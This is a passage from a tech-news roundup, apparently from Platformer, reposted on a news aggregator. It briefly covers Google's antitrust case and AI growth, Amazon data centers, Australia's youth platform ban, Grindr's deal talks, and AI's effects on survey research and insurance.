A judge is set to decide on remedies for Google’s adtech monopoly next year. Italy closed its probe into Google over unfair practices that used personal data. Google stock closed at a record high last week after the successful launch of Gemini 3. AI Mode now has ads.
Something for the AI skeptics: Google must double its serving capacity every six months to meet current demand for AI services, Google Cloud VP Amin Vahdat said.
AI demand has strained the memory chip supply chain, chipmakers said.
Amazon has more than 900 data centers — more than previously known — in more than 50 countries. Its Autonomous Threat Analysis system uses specialized AI agents for debugging. AWS said it would invest $50 billion in AI capabilities for federal agencies.
Twitch was added to Australia’s list of platforms banned for under-16s. Pinterest was spared.
Grindr said it ended talks on a $3.5 billion take-private deal, citing uncertainty over financing.
Interviews with AI quality raters who are telling their friends and family not to use the tech. How AI is threatening the fundamental method of online survey research by evading bot detection techniques. Insurers are looking to limit their liability on claims related to AI. Another look at how America’s economy is now deeply tied to AI stocks and their performance.
Scientists built an AI model that can flag human genetic mutations likely to cause disease.
For more good posts every day, follow Casey’s Instagram stories.
Send us tips, comments, questions, and your questions for the tech CEOs: casey@platformer.news. Read our ethics policy here.
...
Read the original on www.platformer.news »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.